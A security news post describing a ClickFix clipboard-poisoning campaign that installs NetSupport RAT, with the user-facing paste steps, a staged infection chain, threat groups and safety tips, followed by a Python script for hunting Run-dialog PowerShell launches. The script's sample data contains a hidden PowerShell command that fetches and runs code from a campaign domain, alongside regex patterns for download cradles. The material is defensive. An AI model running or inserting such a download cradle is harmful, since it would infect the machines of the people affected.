NEWS If You’re Getting Hit with a RAT, Might as Well Be via Clipboard — Smooth, Fast, Flashy

ExcalibuR


Just one careless Ctrl+V — and you're already in someone else’s remote panel.
Security researchers from DomainTools have uncovered a new malware campaign using a sleek combination of clipboard poisoning and social engineering to infect victims with NetSupport RAT, a legitimate remote access tool often weaponized by cybercriminals.

🧪 The Attack — Clean UI, Dirty Tricks

Victims land on spoofed websites impersonating trusted services like Gitcode and DocuSign. These fake pages feature realistic designs and even display a CAPTCHA-style verification popup — but here’s the twist:


While you’re trying to “verify,” a malicious PowerShell script is silently copied to your clipboard.

Next, users are instructed (via the page or an overlay) to:


  1. Press Win + R to open the Run dialog.
  2. Hit Ctrl + V to paste (unknowingly) the script.
  3. Press Enter.

This method — known as ClickFix — relies on users trusting the process. One click, and you're compromised.

🧬 The Infection Chain

Once triggered, the script starts a multi-stage download process:


  • Stage 1: Initial PowerShell loader contacts tradingviewtool[.]com.
  • Stage 2: Fetches an executable wbdims.exe from GitHub, set to auto-launch at system startup.
  • Stage 3: This component connects to docusign.sa[.]com, which sends further scripts via crafted URLs.
  • Stage 4: A ZIP archive is downloaded containing jp2launcher.exe, which finally installs NetSupport RAT.

Each PowerShell command passes the baton to the next, forming a layered infection mechanism that's difficult to detect or dissect.

🕵️ Why It Matters

NetSupport RAT, though originally a legit IT tool, is now a regular in toolkits of groups like:


  • FIN7
  • Scarlet Goldfinch
  • Storm-0408

Once inside, attackers can:


  • Record your screen
  • Exfiltrate sensitive files
  • Execute remote commands
  • Access credentials, documents, and anything else


🔄 Familiar Pattern: FakeUpdates 2.0?

Researchers note similarities to the SocGholish (FakeUpdates) campaign:


  • Copy-paste payloads
  • Domain structures
  • Social lures
  • Hosted payload chains

🧯 How to Stay Safe

  • Never run clipboard content blindly.
    If a website tells you to “paste something into Run,” stop immediately.
  • Use script-blocking security tools, especially for PowerShell and CMD.
  • Beware of CAPTCHA fakes — especially when paired with odd system prompts.
  • Block known malicious domains (*.sa[.]com, tradingviewtool[.]com, etc.) at the DNS level.
  • Limit PowerShell permissions or use constrained language mode in enterprise environments.
Bottom line:
In 2025, you don’t need to download an EXE to get infected. Sometimes, just Ctrl+V is enough.
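One way a defender can hunt for the launch shape described above in process-creation telemetry, as an added example that is not part of the original post or of DomainTools' research. It assumes Sysmon-style Event ID 1 fields (ParentImage, Image, CommandLine), uses constructed sample events, and takes the two domains from the infection chain above; the detection rests on the fact that anything started from the Run dialog is a child of explorer.exe.

```python
import re

# Constructed Sysmon-style process-creation events (Event ID 1 fields); not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr https://tradingviewtool.com/init)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Date"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoProfile -File C:\Scripts\inventory.ps1"},
]

# Domains named in the campaign write-up, undefanged so they match real command lines.
KNOWN_C2 = ("tradingviewtool.com", "docusign.sa.com")

# Win+R launches are children of explorer.exe; these interpreters are the usual ClickFix targets.
RUN_DIALOG_CHILDREN = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")

INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(
        r"\b(iwr|iex|invoke-webrequest|invoke-expression|downloadstring|curl)\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

def is_run_dialog_launch(evt):
    """True when a script interpreter was spawned directly by explorer.exe (Run dialog shape)."""
    parent = evt["ParentImage"].lower().rsplit("\\", 1)[-1]
    child = evt["Image"].lower().rsplit("\\", 1)[-1]
    return parent == "explorer.exe" and child in RUN_DIALOG_CHILDREN

def command_indicators(cmdline):
    """Names of the suspicious traits found in a command line, in a stable order."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    if any(d in cmdline.lower() for d in KNOWN_C2):
        hits.append("known_c2_domain")
    return hits

def triage(evt):
    """Alert only on the combination: Run-dialog launch plus at least one indicator."""
    hits = command_indicators(evt["CommandLine"])
    from_run = is_run_dialog_launch(evt)
    return {"run_dialog": from_run, "indicators": hits, "alert": from_run and bool(hits)}

if __name__ == "__main__":
    for evt in SAMPLE_EVENTS:
        print(triage(evt))
```

A plain `powershell Get-Date` typed into Run is not flagged, which keeps the rule usable for admins; tune INDICATORS and KNOWN_C2 to your own environment and threat intel.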